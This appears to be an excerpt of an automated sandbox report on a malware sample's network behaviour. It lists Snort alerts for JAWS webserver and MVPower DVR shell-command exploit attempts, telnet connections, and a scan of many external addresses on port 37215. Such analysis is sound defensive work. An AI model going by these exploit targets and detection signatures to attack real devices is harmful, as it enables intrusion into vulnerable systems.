Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60098 -> 13.55.91.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56110 -> 104.64.130.77:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.64.130.77:80 -> 192.168.2.23:56110
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47052 -> 184.168.137.54:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34152 -> 192.99.143.98:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44014 -> 104.109.117.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47008 -> 43.255.108.94:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37630 -> 156.240.39.3:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60098 -> 13.55.91.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57218 -> 31.19.184.171:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44014 -> 104.109.117.106:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.109.117.106:80 -> 192.168.2.23:44014
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37630 -> 156.240.39.3:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47692
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44106 -> 139.162.229.143:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47352 -> 31.208.99.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37748 -> 104.18.66.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44106 -> 139.162.229.143:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37748 -> 104.18.66.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47352 -> 31.208.99.77:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47818
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56204 -> 195.225.34.29:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57852 -> 188.111.50.247:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56204 -> 195.225.34.29:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58694 -> 94.140.229.82:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57852 -> 188.111.50.247:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53436 -> 65.36.226.43:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34118 -> 76.200.91.184:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58694 -> 94.140.229.82:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56224 -> 192.119.107.248:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33204 -> 40.118.173.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53436 -> 65.36.226.43:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60454 -> 23.13.120.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58256 -> 206.189.155.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34118 -> 76.200.91.184:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35794 -> 156.67.65.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56224 -> 192.119.107.248:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33204 -> 40.118.173.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37096 -> 136.0.151.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60454 -> 23.13.120.245:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.13.120.245:80 -> 192.168.2.23:60454
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35794 -> 156.67.65.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38050 -> 139.99.197.232:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58256 -> 206.189.155.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37096 -> 136.0.151.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38050 -> 139.99.197.232:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33784 -> 51.255.48.130:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33784 -> 51.255.48.130:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47900
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48614 -> 195.224.198.148:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53482 -> 23.47.32.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48614 -> 195.224.198.148:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56958 -> 34.249.35.248:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53482 -> 23.47.32.31:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.47.32.31:80 -> 192.168.2.23:53482
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56958 -> 34.249.35.248:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38452 -> 54.255.225.69:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43500 -> 156.213.72.167:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34422 -> 102.22.248.62:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43500 -> 156.213.72.167:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54278 -> 54.254.184.145:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38452 -> 54.255.225.69:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34422 -> 102.22.248.62:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54278 -> 54.254.184.145:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34722 -> 13.230.241.127:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60100 -> 59.126.58.157:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34722 -> 13.230.241.127:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60100 -> 59.126.58.157:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56936 -> 118.214.30.19:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41974 -> 209.212.38.169:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44040 -> 35.177.236.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45564 -> 44.225.184.188:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40660 -> 23.5.198.5:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56936 -> 118.214.30.19:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 118.214.30.19:80 -> 192.168.2.23:56936
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44040 -> 35.177.236.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56000 -> 104.65.62.161:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58712 -> 67.192.246.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41974 -> 209.212.38.169:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56860 -> 23.210.205.99:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55890 -> 45.38.40.243:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56000 -> 104.65.62.161:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.65.62.161:80 -> 192.168.2.23:56000
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45564 -> 44.225.184.188:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40660 -> 23.5.198.5:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.5.198.5:80 -> 192.168.2.23:40660
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58712 -> 67.192.246.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56860 -> 23.210.205.99:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.210.205.99:80 -> 192.168.2.23:56860
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34924 -> 167.57.119.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55890 -> 45.38.40.243:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34924 -> 167.57.119.142:80

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35056
Source: unknown	Network traffic detected: HTTP traffic on port 42128 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35062
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35108
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35146
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35164
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35230
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35248
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35254
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35306
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35316
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35324
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35338
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35378
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35382
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35388
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35404
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35410
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35456
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35500
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35506
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45552
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45556
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45562
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45570
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45592
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45604
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45618
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45646
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45656
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45700
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45734
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45746
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45750
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45756
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45760
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45768
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45782
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45800
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45814
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45844
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45884
Source: unknown	Network traffic detected: HTTP traffic on port 34666 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34666
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215

Passes username and password via HTTP get

Source: global traffic

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.136.59.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.179.128.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.40.28.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.30.137.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.72.64.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.18.197.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.184.134.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.6.153.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.28.226.250:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.7.165.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.160.18.209:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.242.121.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.169.148.209:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.16.115.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.22.56.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.105.47.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.50.185.145:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.178.175.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.168.186.109:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.85.4.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.31.81.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.118.114.139:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.126.184.109:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.101.110.29:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.238.0.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.83.67.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.244.170.150:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.19.163.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.26.130.38:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.132.82.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.73.46.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.72.161.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.72.22.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.50.78.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.19.34.30:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.100.145.233:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.234.191.86:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.133.88.159:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.229.217.40:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.66.212.218:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.223.13.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.122.231.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.191.92.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.154.205.251:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.130.241.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.45.222.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.61.97.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.248.97.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.102.220.180:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.151.251.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.124.23.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.229.64.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.237.56.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.208.34.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.184.97.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.23.2.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.34.61.133:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.92.88.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.140.41.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.126.232.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.62.213.82:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.63.223.141:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.239.176.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.198.235.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.130.136.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.134.116.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.114.180.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.100.201.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.71.226.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.0.59.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.133.150.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.78.73.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.53.111.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.51.1.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.67.28.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.201.49.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.176.156.45:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.215.145.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.125.2.115:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.74.68.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.141.95.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.8.213.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.199.24.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.220.146.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.150.116.149:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.182.210.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.104.9.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.140.179.232:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.135.11.123:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.5.217.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.141.250.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.110.20.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.76.7.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.121.255.97:37215
